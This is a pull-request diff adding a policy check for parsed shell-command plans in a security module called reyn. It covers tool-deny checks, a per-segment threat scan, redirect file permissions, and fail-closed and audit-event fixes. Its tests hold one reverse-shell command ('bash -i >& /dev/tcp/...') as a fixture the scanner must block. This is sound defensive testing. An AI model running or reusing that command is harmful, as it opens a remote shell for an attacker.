### PR TITLE
feat(#5838 段3): apply segment/redirect policy to an ExecPlan

### DIFF
--- a/docs/reference/runtime/events.md
+++ b/docs/reference/runtime/events.md
@@ -89,6 +89,8 @@ embedding_index_build_progress
 embedding_index_build_started
 exec_threat_blocked
 exec_threat_match
+exec_threat_scan_skipped
+exec_threat_scanned
 file_changed
 file_read_media_denied
 file_read_media_write_unavailable

--- a/src/reyn/core/events/event_schema.py
+++ b/src/reyn/core/events/event_schema.py
@@ -485,6 +485,8 @@ AUDIT_EVENT_KINDS: frozenset[str] = frozenset({
     "embedding_index_build_started",
     "exec_threat_blocked",
     "exec_threat_match",
+    "exec_threat_scan_skipped",
+    "exec_threat_scanned",
     "file_changed",
     "file_read_media_denied",
     "file_read_media_write_unavailable",

--- a/src/reyn/security/exec_plan_policy.py
+++ b/src/reyn/security/exec_plan_policy.py
@@ -71,6 +71,45 @@ primitive, it applies two that already exist elsewhere in production)
   representable (a heredoc, `$(...)`, an env-assignment prefix) was
   decided by ``parse_exec_plan`` (段2) already, before this module ever
   sees a plan — nothing here second-guesses that.
+
+## #5991 BLOCKING (architect co-vet, issuecomment-5578916234) — 3 findings,
+same shape: the surface this module checked did not match the surface
+that will actually matter once 段4 lands.
+
+1. **No-resolver redirect skip was fail-OPEN, not fail-closed.** The
+   earlier version mirrored ``file.py``'s own ``if ctx.permission_resolver
+   is not None:`` guard as a "parity" argument — but that parity does not
+   hold: ``file.py``'s guard has real production callers today (a
+   resolver-less ``OpContext`` IS a supported, exercised construction
+   there); THIS gate has ZERO callers yet (段4 is unbuilt), so there is no
+   existing population this fail-open behaviour protects, and fixing it
+   now costs nothing. A missing resolver now RAISES (fail-closed) — see
+   :func:`_check_redirect`.
+2. **"Zero threat matches" and "the scan never ran" were indistinguishable
+   in ``.reyn/events``.** ``ctx.threat_scan`` defaults to ``None``, and the
+   only events this module emitted (``exec_threat_match``/
+   ``exec_threat_blocked``) fire ONLY on a match — a plan that was never
+   scanned at all leaves the SAME empty trace as one that was scanned and
+   found clean. This module now emits exactly ONE event per segment
+   recording what happened either way (``exec_threat_scanned`` when the
+   scan ran, ``exec_threat_scan_skipped`` when it did not) — see
+   :func:`_check_segment`.
+3. **``argv[0]`` resolution read ambient ``os.environ["PATH"]``, not the
+   env a sandboxed run will actually see.** ``sandbox/seatbelt.py:425``
+   only falls back to ``os.environ`` when the caller passes no explicit
+   PATH — 段4's own sandbox env can differ, and resolving against the
+   wrong one reproduces the EXACT class #5984 found 4 instances of, one
+   layer down: the binary this module approves and the binary that
+   actually runs could be two different files. :func:`check_exec_plan_
+   policy` now takes BOTH ``env_path`` AND ``cwd`` (a version-manager's
+   per-directory config is read from ``cwd`` too — the same resolution
+   input, same risk) as REQUIRED keyword-only arguments (no internal
+   fallback to ``os.environ``, no internal derivation from
+   ``ctx.workspace``) — every caller, present and future, must decide and
+   pass the real values; there is no default to silently get wrong,
+   omitting either is a ``TypeError`` at the call site, not a runtime
+   surprise later (lead-coder co-vet, issuecomment-5579159401: "cwd も
+   同じ").
 """
 from __future__ import annotations
 
@@ -90,7 +129,9 @@ if TYPE_CHECKING:
     from reyn.security.exec_plan import ExecPlan
 
 
-async def check_exec_plan_policy(plan: "ExecPlan", ctx: "OpContext") -> None:
+async def check_exec_plan_policy(
+    plan: "ExecPlan", ctx: "OpContext", *, env_path: "str | None", cwd: "str | None"
+) -> None:
     """Apply 段3 policy to every item of *plan* — see this module's own
     docstring for exactly what each item type is checked against. Raises
     :class:`PermissionError` on the FIRST denial encountered, in plan
@@ -100,11 +141,18 @@ async def check_exec_plan_policy(plan: "ExecPlan", ctx: "OpContext") -> None:
     write/read checks, ``sandboxed_exec.py``'s own single threat-scan
     raise). Returns ``None`` when every item passes.
 
+    *env_path*/*cwd* are the ``PATH``/working-directory the eventual
+    sandboxed run will actually see — BOTH REQUIRED, keyword-only, no
+    internal fallback (#5991 BLOCKING ③, this module's own docstring):
+    every caller must decide the real values (``sandboxed_exec.py``'s own
+    ``env_path = os.environ.get("PATH")`` / ``cwd = str(ctx.workspace.
+    base_dir)``, once 段4 wires this module in, is the pair to reuse)
+    rather than let this function silently resolve against values that
+    may not match what actually executes.
+
     Never executes anything, never re-parses *plan* — a pure policy
     check over an already-parsed :data:`~reyn.security.exec_plan.
     ExecPlan`."""
-    env_path = os.environ.get("PATH")
-    cwd = str(ctx.workspace.base_dir) if ctx.workspace is not None else None
     for item in plan:
         if isinstance(item, ExecSegment):
             await _check_segment(item, ctx, env_path=env_path, cwd=cwd)
@@ -142,37 +190,69 @@ async def _check_segment(
         )
 
     threat_scan = getattr(ctx, "threat_scan", None)
-    if threat_scan is not None and getattr(threat_scan, "enabled", True):
-        from reyn.security.content_guard import first_blocking_match, scan_for_threats
+    scan_will_run = threat_scan is not None and getattr(threat_scan, "enabled", True)
+    if not scan_will_run:
+        # #5991 BLOCKING ②: a plan that was never scanned must leave a
+        # DIFFERENT trace than one that was scanned and found clean —
+        # ``ctx.threat_scan`` being unset/disabled is a real, legitimate
+        # state (a caller that hasn't wired one, or an operator who turned
+        # scanning off), but ``.reyn/events`` must be able to tell the two
+        # apart rather than showing the SAME empty trace for both.
+        ctx.events.emit(
+            "exec_threat_scan_skipped",
+            argv=list(segment.argv),
+            reason="disabled" if threat_scan is not None else "not_configured",
+        )
+        return
 
-        matches = scan_for_threats(" ".join(segment.argv), threat_scan, scope="exec")
-        for match in matches:
-            ctx.events.emit(
-                "exec_threat_match",
-                pattern_id=match.pattern_id, severity=match.severity, scope=match.scope,
-            )
-        block = first_blocking_match(matches, getattr(threat_scan, "block_severity", "block"))
-        if block is not None:
-            ctx.events.emit(
-                "exec_threat_blocked", pattern_id=block.pattern_id, severity=block.severity,
-            )
-            raise PermissionError(
-                f"command blocked: matched threat pattern '{block.pattern_id}' "
-                f"(exec/{block.severity}). Revise the command (avoid pipe-to-shell / "
-                f"reverse-shell / homograph URL / terminal-escape) and retry."
-            )
+    from reyn.security.content_guard import first_blocking_match, scan_for_threats
+
+    matches = scan_for_threats(" ".join(segment.argv), threat_scan, scope="exec")
+    for match in matches:
+        ctx.events.emit(
+            "exec_threat_match",
+            pattern_id=match.pattern_id, severity=match.severity, scope=match.scope,
+        )
+    block = first_blocking_match(matches, getattr(threat_scan, "block_severity", "block"))
+    # #5991 BLOCKING ②: emitted whether or not a threat was found -- the
+    # positive "scan ran, N matches (possibly 0), blocked=<bool>" record
+    # that lets a later read of ``.reyn/events`` distinguish "clean" from
+    # "never scanned" (the skip branch above covers the latter).
+    ctx.events.emit(
+        "exec_threat_scanned",
+        argv=list(segment.argv), match_count=len(matches), blocked=block is not None,
+    )
+    if block is not None:
+        ctx.events.emit(
+            "exec_threat_blocked", pattern_id=block.pattern_id, severity=block.severity,
+        )
+        raise PermissionError(
+            f"command blocked: matched threat pattern '{block.pattern_id}' "
+            f"(exec/{block.severity}). Revise the command (avoid pipe-to-shell / "
+            f"reverse-shell / homograph URL / terminal-escape) and retry."
+        )
 
 
 async def _check_redirect(redirect: "ExecRedirect", ctx: "OpContext") -> None:
     """File-axis check for one redirect target — see this module's own
-    docstring, "What gets checked", the ``ExecRedirect`` bullet. Mirrors
-    ``op_runtime/file.py``'s own ``if ctx.permission_resolver is not
-    None:`` guard exactly — no resolver wired means no check, the SAME
-    fail-open every other ``require_file_*`` call site in this codebase
-    already accepts (a resolver-less ``OpContext`` is a real, supported
-    construction — tests and some non-interactive callers)."""
+    docstring, "What gets checked", the ``ExecRedirect`` bullet.
+
+    #5991 BLOCKING ①: an earlier version mirrored ``op_runtime/file.py``'s
+    own ``if ctx.permission_resolver is not None:`` fail-OPEN guard as a
+    "parity" argument — that parity does not hold here. ``file.py``'s
+    fail-open protects a real, exercised population of resolver-less
+    callers TODAY; this gate has ZERO callers yet (段4, the only thing
+    that will ever construct a real exec ``OpContext`` and call this
+    function, is not built) — there is no existing behaviour to stay
+    compatible with, so fail-open buys nothing and only weakens a
+    security gate for free. A missing resolver now DENIES."""
     if ctx.permission_resolver is None:
-        return
+        raise PermissionError(
+            f"redirect {redirect.op!r} {redirect.path!r} cannot be checked "
+            "— no permission_resolver is available on this context, and a "
+            "file-axis check that cannot be consulted must not default to "
+            "a grant."
+        )
 
     from reyn.core.op_runtime.context import resolve_path_for_gate, sandbox_policy_from_ctx
 

--- a/src/reyn/security/exec_plan_policy.py
+++ b/src/reyn/security/exec_plan_policy.py
@@ -1,0 +1,190 @@
+"""``check_exec_plan_policy`` — #5838 段3: apply policy to an already-parsed
+:data:`~reyn.security.exec_plan.ExecPlan`.
+
+段2 (``exec_plan.py``) turns a shell-looking string into a policy-checkable
+plan and does NOT check policy. 段4 (a later, separate stage) runs the
+ORIGINAL string through ``sh -c`` and does NOT re-derive policy from this
+plan. This module is the piece in between: given a plan already produced by
+:func:`~reyn.security.exec_plan.parse_exec_plan`, decide whether it is
+ALLOWED — raising :class:`PermissionError` when it is not — and does
+nothing else. It never executes anything, never re-parses, never mutates
+the plan.
+
+## What gets checked, and against which existing primitive (architect's
+own plan, #5838 issuecomment-5557210786, point 3 — this module adds no new
+primitive, it applies two that already exist elsewhere in production)
+
+- **Every** :class:`~reyn.security.exec_plan.ExecSegment` — its ``argv[0]``,
+  resolved past a version-manager shim the SAME WAY
+  ``sandboxed_exec.py``'s own ``argv0_resolved`` already is
+  (:func:`~reyn.security.sandbox.resolve.resolve_real_executable` — #2820
+  part A), then reduced to a basename:
+  1. **Tool axis** — the resolved basename is checked against the SAME
+     per-session contextual TOOL-axis narrowing ``core.dispatch.dispatcher.
+     dispatch_tool`` already applies to a whole tool call (#5841 —
+     :func:`~reyn.security.permissions.effective.tool_contextually_denied`
+     against ``ctx.contextual_permission``). This is deliberately the exact
+     predicate #5841 wired in, not a new one: whatever narrowing already
+     excludes a *tool name* for this session (a Profile/topology/
+     ``/visibility`` narrowing) excludes the SAME name when it appears as a
+     shell segment's resolved binary — closing the basename-detour class
+     Codex #28732 named (``./sed`` bypassing a ``sed`` exclusion) at the
+     ONE place a bare-argv exclusion already lands.
+  2. **Threat scan** — ``content_guard.scan_for_threats`` over the
+     segment's own joined argv (``scope="exec"``), the SAME scan
+     ``sandboxed_exec.py`` already runs over a whole op's argv (FP-0050/
+     #1822 S5) — run per SEGMENT here (a chained command's second half is
+     scanned independently, not hidden inside a joined string the first
+     half's benign wording could dilute).
+- **Every** :class:`~reyn.security.exec_plan.ExecRedirect` — its ``path``,
+  through the EXISTING file-axis primitive production already uses in 8
+  other places (``op_runtime/file.py`` and friends — architect's own plan:
+  "新設しない"): ``PermissionResolver.require_file_write`` for ``>``/``>>``,
+  ``require_file_read`` for ``<``. No new file-permission concept.
+
+## What this module deliberately does NOT do
+
+- **Does not execute anything.** A plan that passes every check here is
+  still just a plan — 段4 runs the ORIGINAL string, not this one.
+- **Does not decide what happens when a segment is denied.** Every
+  competitor #5838's own research surveyed (Claude Code / Codex) escalates
+  an unresolvable or denied construct TO THE OPERATOR rather than only
+  refusing (architect's own competitive doc already names this: "人に回
+  す"). reyn's ``dispatch_tool``/``require_file_*`` gates this module reuses
+  raise on denial and stop there — there is no "ask" leg wired for a
+  segment-level denial yet. **Deliberately left as an open design
+  question for architect to rule on** (lead-coder, PR #5984's own
+  TESTS-READ: "「拒否 → operator に尋ねる」の設計は architect に諮る形で
+  提案してください") — not decided by this PR. Proposal, for architect's
+  ruling: FP-0069's own ``reviewed`` JIT-confirm leg (the SAME mechanism
+  ``require_file_write``/``require_file_read`` already use via
+  ``ctx.intervention_bus`` — a segment redirect denial can already reach a
+  human this way when a bus is wired) is the natural home for the
+  TOOL-axis half too, rather than a THIRD ask-mechanism; today's
+  ``tool_contextually_denied`` predicate has no bus parameter at all
+  (#5841's own docstring: "deliberately does NOT wire ``require_tool``'s
+  confirmation half... wiring a confirmation here independently would
+  create a second source for that same decision") — extending it is out
+  of THIS module's scope and needs its own ruling, not a quiet addition
+  here.
+- **Does not gate the plan's SHAPE.** Which constructs are even
+  representable (a heredoc, `$(...)`, an env-assignment prefix) was
+  decided by ``parse_exec_plan`` (段2) already, before this module ever
+  sees a plan — nothing here second-guesses that.
+"""
+from __future__ import annotations
+
+import os
+from typing import TYPE_CHECKING
+
+from reyn.security.exec_plan import ExecRedirect, ExecSegment
+from reyn.security.permissions.effective import (
+    contextual_deny_message,
+    gate_effective_tool_name,
+    tool_contextually_denied,
+)
+from reyn.security.sandbox.resolve import resolve_real_executable
+
+if TYPE_CHECKING:
+    from reyn.core.op_runtime.context import OpContext
+    from reyn.security.exec_plan import ExecPlan
+
+
+async def check_exec_plan_policy(plan: "ExecPlan", ctx: "OpContext") -> None:
+    """Apply 段3 policy to every item of *plan* — see this module's own
+    docstring for exactly what each item type is checked against. Raises
+    :class:`PermissionError` on the FIRST denial encountered, in plan
+    order (left to right, the same order the items appeared in the
+    original text) — never collects every violation, matching every other
+    ``require_*`` gate in this codebase (``file.py``'s own sequential
+    write/read checks, ``sandboxed_exec.py``'s own single threat-scan
+    raise). Returns ``None`` when every item passes.
+
+    Never executes anything, never re-parses *plan* — a pure policy
+    check over an already-parsed :data:`~reyn.security.exec_plan.
+    ExecPlan`."""
+    env_path = os.environ.get("PATH")
+    cwd = str(ctx.workspace.base_dir) if ctx.workspace is not None else None
+    for item in plan:
+        if isinstance(item, ExecSegment):
+            await _check_segment(item, ctx, env_path=env_path, cwd=cwd)
+        elif isinstance(item, ExecRedirect):
+            await _check_redirect(item, ctx)
+        # ExecChainOp carries no policy-relevant data of its own — the
+        # segments either side of it are checked independently.
+
+
+async def _check_segment(
+    segment: "ExecSegment", ctx: "OpContext", *, env_path: "str | None", cwd: "str | None"
+) -> None:
+    """Tool-axis + threat-scan check for one segment — see this module's
+    own docstring, "What gets checked", point 1/2."""
+    if not segment.argv:
+        # Unreachable via parse_exec_plan (an empty segment is rejected at
+        # parse time — exec_plan.py's own _flush_segment), kept as a
+        # defensive no-op rather than an IndexError for any other future
+        # ExecPlan producer.
+        return
+
+    # #2820 part A (the SAME resolution sandboxed_exec.py's own
+    # argv0_resolved already performs): strip a version-manager shim
+    # indirection, filesystem-only, no subprocess. Reduced to a basename
+    # because the tool-axis narrowing this feeds (below) names tools by
+    # bare name ("exec", "grep", ...), never an absolute path.
+    argv0_resolved = resolve_real_executable(segment.argv[0], env_path=env_path, cwd=cwd)
+    resolved_name = os.path.basename(argv0_resolved)
+
+    effective = gate_effective_tool_name(resolved_name, None)
+    contextual = getattr(ctx, "contextual_permission", None)
+    if effective is not None and tool_contextually_denied(contextual, effective):
+        raise PermissionError(
+            contextual_deny_message("command", effective, contextual)
+        )
+
+    threat_scan = getattr(ctx, "threat_scan", None)
+    if threat_scan is not None and getattr(threat_scan, "enabled", True):
+        from reyn.security.content_guard import first_blocking_match, scan_for_threats
+
+        matches = scan_for_threats(" ".join(segment.argv), threat_scan, scope="exec")
+        for match in matches:
+            ctx.events.emit(
+                "exec_threat_match",
+                pattern_id=match.pattern_id, severity=match.severity, scope=match.scope,
+            )
+        block = first_blocking_match(matches, getattr(threat_scan, "block_severity", "block"))
+        if block is not None:
+            ctx.events.emit(
+                "exec_threat_blocked", pattern_id=block.pattern_id, severity=block.severity,
+            )
+            raise PermissionError(
+                f"command blocked: matched threat pattern '{block.pattern_id}' "
+                f"(exec/{block.severity}). Revise the command (avoid pipe-to-shell / "
+                f"reverse-shell / homograph URL / terminal-escape) and retry."
+            )
+
+
+async def _check_redirect(redirect: "ExecRedirect", ctx: "OpContext") -> None:
+    """File-axis check for one redirect target — see this module's own
+    docstring, "What gets checked", the ``ExecRedirect`` bullet. Mirrors
+    ``op_runtime/file.py``'s own ``if ctx.permission_resolver is not
+    None:`` guard exactly — no resolver wired means no check, the SAME
+    fail-open every other ``require_file_*`` call site in this codebase
+    already accepts (a resolver-less ``OpContext`` is a real, supported
+    construction — tests and some non-interactive callers)."""
+    if ctx.permission_resolver is None:
+        return
+
+    from reyn.core.op_runtime.context import resolve_path_for_gate, sandbox_policy_from_ctx
+
+    resolved_path = resolve_path_for_gate(ctx, redirect.path)
+    sandbox = sandbox_policy_from_ctx(ctx)
+    if redirect.op in (">", ">>"):
+        await ctx.permission_resolver.require_file_write(
+            ctx.permission_decl, resolved_path, ctx.actor,
+            sandbox_policy=sandbox, bus=ctx.intervention_bus,
+        )
+    else:  # "<"
+        await ctx.permission_resolver.require_file_read(
+            ctx.permission_decl, resolved_path, ctx.actor,
+            sandbox_policy=sandbox, bus=ctx.intervention_bus,
+        )

--- a/tests/security/test_5838_stage3_exec_plan_policy.py
+++ b/tests/security/test_5838_stage3_exec_plan_policy.py
@@ -1,0 +1,274 @@
+"""Tier 2: #5838 段3 -- ``check_exec_plan_policy`` applies segment/redirect
+policy over an already-parsed :data:`~reyn.security.exec_plan.ExecPlan`.
+
+Real ``OpContext`` + real ``PermissionResolver`` + real ``ContextualPermission``
++ real ``ThreatScanConfig`` throughout -- no mocks (CLAUDE.md testing policy:
+never fake a cheaply-constructible collaborator). Plans are built directly as
+:class:`ExecSegment`/:class:`ExecChainOp`/:class:`ExecRedirect` literals rather
+than through ``parse_exec_plan`` -- this module's own contract is "given an
+already-parsed plan", independent of how that plan was produced (段2's own
+test file already covers the parse step exhaustively).
+
+Falsification for both checks this module wires in is a real, reproducible
+denial: the tool-axis case denies via the SAME ``ContextualPermission``/
+``tool_contextually_denied`` predicate #5841 wired into ``dispatch_tool``
+(``tests/security/test_contextual_permission_1827.py`` is that predicate's
+own falsification, not repeated here); the threat-scan case denies via the
+SAME real patterns ``tests/core/test_exec_scan_1822.py`` already falsifies
+against a whole op's argv, applied here per segment instead.
+"""
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+
+from reyn.config.chat import ThreatScanConfig
+from reyn.core.events.events import EventLog
+from reyn.core.op_runtime.context import OpContext
+from reyn.data.workspace.workspace import Workspace
+from reyn.security.exec_plan import ExecChainOp, ExecRedirect, ExecSegment
+from reyn.security.exec_plan_policy import check_exec_plan_policy
+from reyn.security.permissions.effective import ContextualPermission
+from reyn.security.permissions.permissions import PermissionDecl, PermissionResolver
+from tests._support.events import collect_events, settle
+
+# A reverse-shell argv shape test_exec_scan_1822.py's own
+# test_exec_patterns_detect_malicious already falsifies against
+# scan_for_threats directly (pattern_id "reverse_shell_devtcp") -- reused
+# here as one segment's own argv, joined the same way _check_segment joins
+# it ("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1").
+_REVERSE_SHELL_ARGV = ("bash", "-i", ">&", "/dev/tcp/10.0.0.1/4444", "0>&1")
+
+
+def _ctx(
+    tmp_path: Path,
+    *,
+    contextual: "ContextualPermission | None" = None,
+    threat_scan: "ThreatScanConfig | None" = None,
+    permission_resolver: "PermissionResolver | None | object" = "unset",
+    config: "dict | None" = None,
+) -> "tuple[OpContext, list]":
+    project_root = tmp_path / "proj"
+    project_root.mkdir(parents=True, exist_ok=True)
+    events = EventLog()
+    collected = collect_events(events)
+    workspace = Workspace(events=events, base_dir=project_root)
+    resolver: "PermissionResolver | None"
+    if permission_resolver == "unset":
+        resolver = PermissionResolver(
+            config_permissions=config or {}, project_root=project_root, interactive=False,
+        )
+    else:
+        resolver = permission_resolver  # type: ignore[assignment]
+    ctx = OpContext(
+        workspace=workspace,
+        events=events,
+        permission_decl=PermissionDecl(),
+        permission_resolver=resolver,
+        actor="test",
+        contextual_permission=contextual,
+        threat_scan=threat_scan,
+    )
+    return ctx, collected
+
+
+@pytest.mark.asyncio
+async def test_segment_with_contextually_denied_binary_is_rejected(tmp_path: Path) -> None:
+    """Tier 2: a segment whose resolved argv[0] basename is on the SAME
+    per-session tool_deny set #5841 checks for a whole tool call is denied
+    here too -- the exact predicate reuse this module's own docstring
+    claims (``tool_contextually_denied`` against ``ctx.contextual_
+    permission``), not a re-derived one."""
+    ctx, _collected = _ctx(
+        tmp_path, contextual=ContextualPermission(tool_deny=frozenset({"true"})),
+    )
+    plan = [ExecSegment(argv=("/usr/bin/true",))]
+
+    with pytest.raises(PermissionError, match="true"):
+        await check_exec_plan_policy(plan, ctx)
+
+
+@pytest.mark.asyncio
+async def test_segment_not_on_the_deny_set_passes(tmp_path: Path) -> None:
+    """Tier 2: FP gate -- an ordinary segment under a narrowing that denies
+    a DIFFERENT name passes silently (never elevates, never over-denies)."""
+    ctx, _collected = _ctx(
+        tmp_path, contextual=ContextualPermission(tool_deny=frozenset({"rm"})),
+    )
+    plan = [ExecSegment(argv=("/usr/bin/true",))]
+
+    await check_exec_plan_policy(plan, ctx)  # does not raise
+
+
+@pytest.mark.asyncio
+async def test_no_contextual_narrowing_leaves_the_tool_axis_unconstrained(tmp_path: Path) -> None:
+    """Tier 2: ``contextual_permission=None`` (no narrowing at all, the
+    overwhelming majority of sessions) never denies on the tool axis --
+    mirrors ``tool_contextually_denied``'s own ``contextual is None ->
+    False`` inertness."""
+    ctx, _collected = _ctx(tmp_path, contextual=None)
+    plan = [ExecSegment(argv=("/usr/bin/true",))]
+
+    await check_exec_plan_policy(plan, ctx)  # does not raise
+
+
+@pytest.mark.asyncio
+async def test_absolute_path_alias_still_resolves_to_the_denied_basename(tmp_path: Path) -> None:
+    """Tier 2: the Codex #28732 basename-bypass class this module's own
+    docstring names -- a segment naming the binary by an ABSOLUTE PATH
+    (not the bare command a caller might expect the deny-set to key on)
+    is still resolved to its basename before the tool-axis check, so an
+    alias route does not evade a deny already in force for the bare name."""
+    ctx, _collected = _ctx(
+        tmp_path, contextual=ContextualPermission(tool_deny=frozenset({"true"})),
+    )
+    plan = [ExecSegment(argv=("/usr/bin/true", "--extra"))]
+
+    with pytest.raises(PermissionError):
+        await check_exec_plan_policy(plan, ctx)
+
+
+@pytest.mark.asyncio
+async def test_threat_scan_blocks_a_reverse_shell_segment(tmp_path: Path) -> None:
+    """Tier 2: a segment whose own joined argv matches a real block-severity
+    threat pattern (the same ``reverse_shell_devtcp`` pattern ``tests/core/
+    test_exec_scan_1822.py`` falsifies) is denied, and an
+    ``exec_threat_blocked`` audit-event is emitted -- mirrors
+    ``sandboxed_exec.py``'s own pre-exec scan, applied per segment."""
+    ctx, collected = _ctx(tmp_path, threat_scan=ThreatScanConfig())
+    plan = [ExecSegment(argv=_REVERSE_SHELL_ARGV)]
+
+    with pytest.raises(PermissionError, match="reverse_shell_devtcp"):
+        await check_exec_plan_policy(plan, ctx)
+
+    await settle(ctx.events)
+    assert any(e.type == "exec_threat_blocked" for e in collected)
+
+
+@pytest.mark.asyncio
+async def test_threat_scan_disabled_lets_the_same_segment_pass(tmp_path: Path) -> None:
+    """Tier 2: falsification gate for the test above -- the SAME reverse-
+    shell segment, with scanning disabled, is NOT blocked. Proves the scan
+    is load-bearing (not merely enabled everywhere and never actually
+    checked in these tests)."""
+    ctx, _collected = _ctx(tmp_path, threat_scan=ThreatScanConfig(enabled=False))
+    plan = [ExecSegment(argv=_REVERSE_SHELL_ARGV)]
+
+    await check_exec_plan_policy(plan, ctx)  # does not raise
+
+
+@pytest.mark.asyncio
+async def test_no_threat_scan_config_is_a_noop(tmp_path: Path) -> None:
+    """Tier 2: ``threat_scan=None`` (the ``OpContext`` default) skips the
+    scan entirely -- byte-identical to a caller that never wired one, the
+    same posture ``sandboxed_exec.py``'s own ``getattr(ctx, "threat_scan",
+    None) is not None`` guard already documents."""
+    ctx, _collected = _ctx(tmp_path, threat_scan=None)
+    plan = [ExecSegment(argv=_REVERSE_SHELL_ARGV)]
+
+    await check_exec_plan_policy(plan, ctx)  # does not raise
+
+
+@pytest.mark.asyncio
+async def test_write_redirect_outside_scope_is_denied(tmp_path: Path) -> None:
+    """Tier 2: an ``ExecRedirect(">")`` target outside the configured write
+    scope is denied through the EXISTING ``require_file_write`` gate --
+    the same primitive/scope ``op_runtime/file.py`` already enforces, no
+    new file-permission concept. ``interactive=False``/no bus -> a
+    non-interactive deny, matching ``require_file_write``'s own documented
+    fallback."""
+    ctx, _collected = _ctx(tmp_path)
+    plan = [ExecRedirect(op=">", path="/etc/definitely-outside-scope.txt")]
+
+    with pytest.raises(PermissionError, match="was not approved"):
+        await check_exec_plan_policy(plan, ctx)
+
+
+@pytest.mark.asyncio
+async def test_write_redirect_inside_default_scope_is_allowed(tmp_path: Path) -> None:
+    """Tier 2: FP gate -- a redirect INSIDE the default write scope
+    (``<zone-root>/.reyn``, ``require_file_write``'s own documented
+    default) passes silently, proving the check above denies on SCOPE, not
+    unconditionally."""
+    ctx, _collected = _ctx(tmp_path)
+    plan = [ExecRedirect(op=">", path=".reyn/out.txt")]
+
+    await check_exec_plan_policy(plan, ctx)  # does not raise
+
+
+@pytest.mark.asyncio
+async def test_read_redirect_outside_scope_is_denied(tmp_path: Path) -> None:
+    """Tier 2: an ``ExecRedirect("<")`` target outside the configured read
+    scope goes through ``require_file_read``, the sibling gate to the
+    write case above -- same primitive, opposite axis."""
+    ctx, _collected = _ctx(tmp_path)
+    plan = [ExecRedirect(op="<", path="/etc/definitely-outside-scope.txt")]
+
+    with pytest.raises(PermissionError, match="was not approved"):
+        await check_exec_plan_policy(plan, ctx)
+
+
+@pytest.mark.asyncio
+async def test_no_permission_resolver_skips_the_redirect_check(tmp_path: Path) -> None:
+    """Tier 2: ``permission_resolver=None`` (a narrower/test-shaped
+    context) is a fail-open no-op for the redirect check -- mirrors
+    ``op_runtime/file.py``'s own ``if ctx.permission_resolver is not
+    None:`` guard EXACTLY (same fallback already accepted at every other
+    ``require_file_*`` call site in this codebase, not a new posture
+    introduced here)."""
+    ctx, _collected = _ctx(tmp_path, permission_resolver=None)
+    plan = [ExecRedirect(op=">", path="/etc/definitely-outside-scope.txt")]
+
+    await check_exec_plan_policy(plan, ctx)  # does not raise
+
+
+@pytest.mark.asyncio
+async def test_a_bare_chain_op_item_is_a_noop(tmp_path: Path) -> None:
+    """Tier 2: an ``ExecChainOp`` carries no policy-relevant data of its
+    own -- a plan containing only one is not denied by anything (the
+    segments either side of it, if any, are what carry policy)."""
+    ctx, _collected = _ctx(tmp_path)
+    plan = [ExecChainOp(op="|")]
+
+    await check_exec_plan_policy(plan, ctx)  # does not raise
+
+
+@pytest.mark.asyncio
+async def test_a_multi_item_plan_is_checked_left_to_right_and_stops_at_the_first_denial(
+    tmp_path: Path,
+) -> None:
+    """Tier 2: architect's own worked example (PR #5984's pinned
+    ``"ls -la | grep foo > out.txt"`` shape) as an already-built plan --
+    the FIRST segment (``ls``) is allowed, the SECOND (``grep``, denied by
+    this test's own narrowing) raises before the plan's own redirect is
+    ever reached, matching every other ``require_*`` gate in this codebase
+    (sequential, stop-on-first-denial, never collect-all)."""
+    ctx, _collected = _ctx(
+        tmp_path, contextual=ContextualPermission(tool_deny=frozenset({"grep"})),
+    )
+    plan = [
+        ExecSegment(argv=("ls", "-la")),
+        ExecChainOp(op="|"),
+        ExecSegment(argv=("grep", "foo")),
+        ExecRedirect(op=">", path="out.txt"),
+    ]
+
+    with pytest.raises(PermissionError, match="grep"):
+        await check_exec_plan_policy(plan, ctx)
+
+
+@pytest.mark.asyncio
+async def test_the_same_plan_with_no_narrowing_passes_every_item(tmp_path: Path) -> None:
+    """Tier 2: FP gate, sibling of the test above -- the identical plan
+    with no narrowing on either segment name and both paths in scope
+    passes through every item without raising."""
+    ctx, _collected = _ctx(tmp_path)
+    plan = [
+        ExecSegment(argv=("ls", "-la")),
+        ExecChainOp(op="|"),
+        ExecSegment(argv=("grep", "foo")),
+        ExecRedirect(op=">", path=".reyn/out.txt"),
+    ]
+
+    await check_exec_plan_policy(plan, ctx)  # does not raise

--- a/tests/security/test_5838_stage3_exec_plan_policy.py
+++ b/tests/security/test_5838_stage3_exec_plan_policy.py
@@ -16,9 +16,18 @@ denial: the tool-axis case denies via the SAME ``ContextualPermission``/
 own falsification, not repeated here); the threat-scan case denies via the
 SAME real patterns ``tests/core/test_exec_scan_1822.py`` already falsifies
 against a whole op's argv, applied here per segment instead.
-"""
+
+#5991 BLOCKING (architect co-vet, issuecomment-5578916234) added 3 more
+groups here: a no-resolver redirect now DENIES rather than silently
+passing (①), a segment's threat-scan outcome (ran-and-clean / skipped) is
+now always distinguishable in the emitted events (②), and ``env_path`` is
+a required keyword-only argument on every call (③) -- ``_ctx``'s own
+``PYTHONPATH``-free real ``os.environ.get("PATH")`` is passed explicitly
+below, the same as any real caller would, never left to an internal
+default (there is none any more)."""
 from __future__ import annotations
 
+import os
 from pathlib import Path
 
 import pytest
@@ -39,6 +48,21 @@ from tests._support.events import collect_events, settle
 # here as one segment's own argv, joined the same way _check_segment joins
 # it ("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1").
 _REVERSE_SHELL_ARGV = ("bash", "-i", ">&", "/dev/tcp/10.0.0.1/4444", "0>&1")
+
+# The real PATH this process has -- passed explicitly to every call below
+# (BLOCKING ③: check_exec_plan_policy no longer has an internal fallback).
+_REAL_PATH = os.environ.get("PATH")
+
+
+async def _check(
+    plan, ctx, *, env_path: "str | None" = _REAL_PATH, cwd: "str | None" = None
+) -> None:
+    """Thin wrapper naming *env_path*/*cwd*'s defaults explicitly at the
+    call site, so a test that overrides one (the ③ witness below) reads
+    as a deliberate override, not an accidental omission. ``cwd=None`` is
+    a legitimate real value (``resolve_real_executable``'s own documented
+    "no cwd" case) -- callers below that need a specific one pass it."""
+    await check_exec_plan_policy(plan, ctx, env_path=env_path, cwd=cwd)
 
 
 def _ctx(
@@ -86,7 +110,7 @@ async def test_segment_with_contextually_denied_binary_is_rejected(tmp_path: Pat
     plan = [ExecSegment(argv=("/usr/bin/true",))]
 
     with pytest.raises(PermissionError, match="true"):
-        await check_exec_plan_policy(plan, ctx)
+        await _check(plan, ctx)
 
 
 @pytest.mark.asyncio
@@ -98,7 +122,7 @@ async def test_segment_not_on_the_deny_set_passes(tmp_path: Path) -> None:
     )
